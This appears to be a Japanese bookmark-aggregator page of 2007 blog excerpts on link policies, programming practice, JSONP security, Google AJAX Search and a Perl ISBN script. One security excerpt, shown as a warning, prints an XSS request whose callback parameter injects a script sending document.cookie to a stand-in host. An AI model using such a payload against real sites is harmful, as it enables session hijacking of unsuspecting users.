高木浩光@自宅の日記 - あるある大事典が「一切リンクお断り」としていた心境を推察すると見えてくるもの
■ あるある大事典が「一切リンクお断り」としていた心境を推察すると見えてくるもの 恥ずかしながら、私の勤務する研究所も、何年か前は、研究所Webサイトへのリンクについて、公序良俗に反するサイトからのリンクを「お断りします」としていた。その理由というのはどうやら、研究成果などに対していかがわしい会社からリンクされることが、ある種の人たちには懸念される事柄と思われているためのようだった。 だが考えてみて欲しい。たとえば、研究所の研究員の発表論文やテクニカルレポートが、食材販売業者のチラシやWebサイトで、参考文献として挙げられているときに、私たちはそれを止めさせる立場にあるだろうか? 論文の参考文献リストへの掲載について 以下のいずれかに該当する出版物、Webサイトその他においては、○○研究所の職員が発表した論文を参考文献リスト等に無断で掲載することをお断りします。 (1) 公序良俗に反するも
暇な人はやってみるといいプログラミングの万能練習法
練習メニューだけ考えてみました。どんな言語にでも使える万能メニューです。あたしゃ暇じゃないのでやりません。手順は以下の通り。 使いたい言語を選択する 書きたい POSIX のコマンドを1つ選択する man 等を読みつつ,仕様を頭に入れる 設計 コーディング テスト(納得いくまで 5 と 6 を往復する) C の場合はソースを読んで答合わせ(※正しい答とは限らない),C じゃない場合はもっといい実装はないか考える(これはちょっとキツいか) 終了(POSIX のコマンドがまだ残っている場合は,2 に戻る) 言語によっては簡単に終わっちゃったりするかもしれないけれど,なかなかいい練習メニューじゃないでしょうか。この練習メニューのいいところは,コーディングの練習になるのと当時に以下の特典が付くことです。
機密情報にJSONPでアクセスするな
2007年6月7日 はてなブックマークのコメントをうけて、「常にJSONP、JSON、JavaScriptに機密事項を含めないように」という主張を改め、「クロスドメインアクセスの対策をとっていない状態ではJSONP、JSON、JavaScriptに機密事項を含めないように」という主張に関して記述しました。 こんにちは、SEの進地です。 今回から週単位でWebアプリケーションのセキュリティに関するエントリーを書いていこうと思います。 僕自身、日々勉強して精進というところですので、もし何らかの誤りがあれば是非ご指摘ください。 つっこみ大歓迎です。 今回取り上げるのはWeb 2.0なアプリケーションでセキュリティ面で気をつけるべきことの一つ、機密情報にJSONPでアクセスするなです。 JSON(JavaScript Object Notation)はJavaScript(ECMAScript)の
Kazuho@Cybozu Labs: JSONP - データ提供者側のセキュリティについて
« E4X-XSS 脆弱性について | メイン | 「スーパー技術者争奪戦」 » 2007年01月12日 JSONP - データ提供者側のセキュリティについて JSONP のセキュリティは、ともすればインクルードする側についての議論になりがちであり、その影でインクルードされる側のリスクが見過ごされがちです。JSONP の使用にあたっては、データ提供者への XSS に注意する必要があります。脆弱な例としては、以下のようなものがあります。 GET /json.cgi/append.html?padding=%3Cscript%3Elocation='http://example.jp/'%2Bdocument.cookie%3C/script%3E HTTP/1.0 Host: example.com HTTP/1.0 200 OK Content-Type: text/javascript;
hail2u.net - Weblog - Google AJAX Search APIのJSONPを利用したサイト内検索
Google AJAX Search APIは、動的にGoogle検索結果を自分のページに挿入することができるAPI(あまり使っているサイトを見ないけど)。Ajaxっつっても内部はJSONP(みたいなもの)だったりするので、普通にGwebSearchクラスのsetSiteRestriction()メソッドを使うのではなく、JSONPを直接叩いてサイト内検索を実装することもできる。もちろんサイト内検索に限った話ではないけど。 Google AJAX Search APIのGwebSearchクラスによる検索は、 http://www.google.com/uds/GwebSearch?callback={コールバック関数名}&context=0&lstkp=0&hl=ja&q={検索文字列}&key={Google AJAX Search API key}&v=0.1 というURLへリクエス
perl - 勝手に添削 - isbn2asin : 404 Blog Not Found
2007年01月24日12:30 カテゴリLightweight Languages perl - 勝手に添削 - isbn2asin 久々の勝手に添削コーナ。今回は、hyukiさんのこちら。 結城浩のはてな日記 Amazon Web Servicesを使って、ISBN-13からASINを取得するPerlプログラムを作ってみました。まずは添削結果。 #!/usr/local/bin/perl use strict; use warnings; use CGI; use LWP::Simple; use XML::Simple; use URI; my $aws_access_key_id = 'YOUR AWS ACCESS KEY'; # For debug. my $OUTPUT_ENCODING = 'UTF8'; # Set up ISBN. my $isbn = shift or
はてなid読み方辞典(付録:呼び方一覧) - www.textfile.org
http://d.hatena.ne.jp/wetfootdog/20070123/p1 「はてな村」的な情報ではあるが、有効かも。 id:rubycoはそれを見越して「るびこ」と最初から振り仮名を振りました。 id:hyukiを「結城浩さん」と書いていただいてありがとうございました。hyukiを「ひゅーき」と心で読んでいる人がいるらしいけれど、結城の心の中では「英知・勇気」と呼んでいます。(べつに「ひゅーき」でもいいですけど)。 追記:「愛・蔵太さん」を「らぶ くらふとさん」と読むとは知らなかった!「あい・ぞうた」と読んでいました。 追記:愛・蔵太の少し調べて書く日記/aboutによれば、「あい・くらた」と読むらしいです。 追記:あ、「英知・勇気」は後で無理矢理考えたんですからね。
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
http://www.okanomail.com/2007/01/blogger-anti-spam-features.html
楽天Web1.0api - www.textfile.org